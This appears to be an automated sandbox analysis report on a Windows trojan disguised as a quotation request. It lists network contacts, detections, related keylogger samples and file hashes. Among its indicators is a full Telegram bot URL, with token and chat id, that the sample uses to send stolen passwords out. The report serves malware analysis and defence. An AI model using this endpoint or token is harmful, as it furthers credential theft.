            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            REQUEST FOR QUOATION AND PRICES.exe13%ReversingLabs
            REQUEST FOR QUOATION AND PRICES.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nsz829B.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.19.174
            truefalse
              high
              drive.usercontent.google.com
              142.250.181.97
              truefalse
                high
                reallyfreegeoip.org
                104.21.67.152
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.228false
                          high
                          http://checkip.dyndns.org/false
                            high
                            https://reallyfreegeoip.org/xml/8.46.123.228false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034D57000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034DAA000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://translate.google.com/translate_a/element.jsREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7876448059:AAFalpFHyU5R24fiMM-B_jN6tgNAqi50gGU/sendDocument?chat_id=7382REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://drive.google.com/REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.0000000004558000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.google.com/TREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2536020620.0000000004558000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1797285940.00000000045CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034D57000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BAD000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034DAA000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BC0000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://apis.google.comREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739292779.00000000045CC000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000003.1739369349.00000000045CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.comREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034D57000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034DAA000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BC0000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorErrorREQUEST FOR QUOATION AND PRICES.exefalse
                                                          high
                                                          http://api.telegram.orgREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034D57000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034DAA000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034C9B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034EC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://checkip.dyndns.org/D7~REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2558244299.0000000037416000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameREQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://reallyfreegeoip.org/xml/REQUEST FOR QUOATION AND PRICES.exe, 0000000A.00000002.2556507666.0000000034BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  149.154.167.220
                                                                  api.telegram.orgUnited Kingdom
                                                                  62041TELEGRAMRUfalse
                                                                  104.21.67.152
                                                                  reallyfreegeoip.orgUnited States
                                                                  13335CLOUDFLARENETUSfalse
                                                                  172.217.19.174
                                                                  drive.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  142.250.181.97
                                                                  drive.usercontent.google.comUnited States
                                                                  15169GOOGLEUSfalse
                                                                  132.226.247.73
                                                                  checkip.dyndns.comUnited States
                                                                  16989UTMEMUSfalse
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1567431
                                                                  Start date and time:2024-12-03 15:20:59 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 7m 22s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:15
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:REQUEST FOR QUOATION AND PRICES.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 116
                                                                  • Number of non-executed functions: 115
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: REQUEST FOR QUOATION AND PRICES.exe
                                                                  TimeTypeDescription
                                                                  10:37:52API Interceptor711x Sleep call for process: REQUEST FOR QUOATION AND PRICES.exe modified
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  149.154.167.220IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          https://connexion-espacesclients.support/gkm/Get hashmaliciousUnknownBrowse
                                                                            Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                              kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                    Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                      104.21.67.152IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            RFQ-2309540_27112024.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      Fonts.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        PO80330293.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          132.226.247.73IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          021337ISOGENERAL.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          PO80330293.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          RYSUNEK_.EXE.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          MICROCHIP QFP3 22 - 25000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          checkip.dyndns.comIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 193.122.130.0
                                                                                                          kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 158.101.44.242
                                                                                                          Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 193.122.130.0
                                                                                                          P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 158.101.44.242
                                                                                                          reallyfreegeoip.orgIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 172.67.177.134
                                                                                                          kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 172.67.177.134
                                                                                                          P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 172.67.177.134
                                                                                                          QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          api.telegram.orgIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                                                          • 149.154.167.220
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          https://connexion-espacesclients.support/gkm/Get hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                                          • 149.154.167.220
                                                                                                          kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 149.154.167.220
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          TELEGRAMRUIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                                                          • 149.154.167.220
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          https://connexion-espacesclients.support/gkm/Get hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                                                                                          • 149.154.167.220
                                                                                                          kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          https://dsiete.co/share.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 149.154.167.220
                                                                                                          CLOUDFLARENETUSRef#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.6
                                                                                                          BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.194.230
                                                                                                          SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          uC8FY7Hvsx.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.97.6
                                                                                                          2112024_RS_GIBANJ -SWIFT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.194.230
                                                                                                          Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 172.67.201.49
                                                                                                          UTMEMUSIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Cotizaci#U00f3n_Pedido_Manzanillo_MX.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          tA5DvuNwfQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Gastroptosis (5).exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          #U00d6denmeyen Kredi Taksit Bilgileriniz.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.67.152
                                                                                                          P#U0142atno#U015b#U0107 8557899,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          678763_PDF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          HALKBANK EFT RECEIPT DATED 02.12.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          QUOTATION_DECQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.67.152
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eRef#60031796.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Ref#1550238.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          BuMdSP88Ze.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          RFQ 9-XTC-204-60THD.xlsx.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 149.154.167.220
                                                                                                          SANTANDER%20AUDITORIA.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Ref#1550238.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Bestellung - 021224 - 901003637.exeGet hashmaliciousQuasarBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Teklif Talebi- #U0130hale 14990_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          NEW90FL0OtSHAz.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          37f463bf4616ecd445d4a1937da06e19IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          yMvZXcwN2OdoP6x.exeGet hashmaliciousDarkCloudBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          Curri.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          36244920cQPUT1.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          1099833039444.pdf.jsGet hashmaliciousRemcosBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          kelscrit.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          1013911.jsGet hashmaliciousFormBookBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          cHtIyrhXeG.lnkGet hashmaliciousUnknownBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          HiDOalUAfc.lnkGet hashmaliciousUnknownBrowse
                                                                                                          • 142.250.181.97
                                                                                                          • 172.217.19.174
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          C:\Users\user\AppData\Local\Temp\nsz829B.tmp\System.dllIBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                            Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                  CL714440147.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    TKnBbCiX07.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                      ________.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        Snurrevoddenes.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          Eksistensberettigelsernes102.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1205335
                                                                                                                              Entropy (8bit):3.531689895208813
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:w8rRdu4ubGzwg2ZCjm8EO6x6l64XFltbJNyeWpKJ:HfRu3gWV8Ebi641llupK
                                                                                                                              MD5:84703BB2E9BBA641ADD27F6758780928
                                                                                                                              SHA1:A14176D85C035EFE574DF2320AEBC9AFBAF74820
                                                                                                                              SHA-256:14616079E42750F701FD299920FD45633EA609080F278C7A8A9386E0C4223E11
                                                                                                                              SHA-512:525D08B61C133D07AAD8CA21FA711F5F42888E5598027FCF9DCB7C3BAEF02F3831C25878E06D740292B08C80265BEEB7316EE7DA14725B6E6B188AD1125254B4
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:d:......,.......,.......\........$......N9......L:............................................................u.........................R...................................................................................................................................................G...J...............h...............................................................g...............................................................j..............................................................................................................................._.......................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                              Category:modified
                                                                                                                              Size (bytes):11264
                                                                                                                              Entropy (8bit):5.801108840712148
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:e/b2HS5ih/7i00eWz9T7PH6yeFcQMI5+Vw+EXWZ77dslFZk:ewSUmWw9T7MmnI5+/F7Kdk
                                                                                                                              MD5:FC90DFB694D0E17B013D6F818BCE41B0
                                                                                                                              SHA1:3243969886D640AF3BFA442728B9F0DFF9D5F5B0
                                                                                                                              SHA-256:7FE77CA13121A113C59630A3DBA0C8AAA6372E8082393274DA8F8608C4CE4528
                                                                                                                              SHA-512:324F13AA7A33C6408E2A57C3484D1691ECEE7C3C1366DE2BB8978C8DC66B18425D8CAB5A32D1702C13C43703E36148A022263DE7166AFDCE141DA2B01169F1C6
                                                                                                                              Malicious:false
                                                                                                                              Antivirus:
